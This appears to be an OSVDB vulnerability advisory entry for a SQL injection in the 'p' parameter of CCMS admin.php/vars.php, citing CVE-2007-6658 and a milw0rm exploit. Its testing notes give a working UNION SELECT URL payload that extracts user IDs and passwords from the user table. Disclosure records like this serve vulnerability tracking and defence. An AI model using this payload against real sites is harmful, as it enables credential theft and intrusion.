CCMS admin.php/vars.php Console Page p Variable SQL Injection

2007-12-29T00:00:00
ID OSVDB:39894
Type osvdb
Reporter OSVDB
Modified 2007-12-29T00:00:00

Description

Manual Testing Notes

http://[target]/[path]/admin.php/vars.php?page=Console&p=1'+union+select+userid,2,3,PASSWORD+from+user+where+userid=$USERID/*

References:

Generic Exploit URL: http://www.milw0rm.com/exploits/4809 CVE-2007-6658